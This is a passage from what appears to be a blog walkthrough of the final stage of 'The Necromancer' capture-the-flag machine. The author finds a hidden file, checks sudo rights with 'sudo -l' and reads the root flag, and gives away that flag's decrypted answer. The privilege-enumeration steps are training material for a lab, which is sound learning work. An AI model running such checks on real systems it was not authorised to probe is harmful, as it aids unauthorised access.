An evil laugh echoes in the room and the black cloud begins to disappear into the cracks
in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.

The Necromancer asks some question and I wished the answers were those stupid numbers that we found. 😪 Useless numbers! Google, once again, saved the day. Decrypting those flags we just found weren’t worth wasting time on. They decrypt to the answers that we provided. In case you’re wondering what happens if you provide wrong answers to those questions:

Kicked Out

The Necromancer kicks you out of the machine and terminates your SSH connection.

Flag 11 : Drink To Satisfy The Thirst Of Power

The last message says:

A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.

Let’s see what that small vile is.


Err…!! There doesn’t seem to be anything. Let’s look carefully as it’s a “small vile”.

ls -lah
total 44
drwxr-xr-x 3 demonslayer demonslayer 512B Jun 23 2016 .
drwxr-xr-x 3 root wheel 512B May 11 2016 ..
-rw-r--r-- 1 demonslayer demonslayer 87B May 11 2016 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773B May 11 2016 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103B May 11 2016 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359B May 11 2016 .login
-rw-r--r-- 1 demonslayer demonslayer 175B May 11 2016 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218B May 11 2016 .profile
-rw-r--r-- 1 demonslayer demonslayer 196B Nov 6 07:26 .smallvile
drwx------ 2 demonslayer demonslayer 512B May 11 2016 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706B May 11 2016 flag8.txt

Turns out it’s so small that it’s not visible at all. We had to look for the hidden files to see it.

cat .smallvile
You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!

So we enjoyed the pleasent odour, drank the liquid and now we seem to have some power! Let’s see if we can get root access. After all there’s no power such as root.

sudo -i
Sorry, user demonslayer is not allowed to execute ‘/bin/ksh’ as root on thenecromancer.

Nope, We’re not allowed to execute our shell as root. So what are we allowed to do?

sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt

Bingo!! Let’s hit it and end this game.

sudo cat /root/flag11.txt

The End

This is the screenshot of my screen when I finished the game. If you decrypt the hash in flag 11, you’ll get the string hackergod.

So, we fought so hard only to discover that we were dreaming and that’s the end of it all!!

Final Words : The End

Had this machine not included the SNMP in it, I would have rated this machine as a beginner’s level. Not a lot of people use SNMP and quite a lot of people know nothing more than its name. But, no matter what level it was, I enjoyed it a lot. The story was well designed and the designers deserve to be appreciated for it.

The machine had some flags which didn’t make any sense to me. It might as be the case that those flags were a direction towards some hidden Easter eggs which I couldn’t figure out but I tried my best and have presented my experience to its best. If you happen to know anything about these Easter eggs, please tell me by commenting below. I hope you enjoyed reading the solution as much as I enjoyed writing it.

Leave a Reply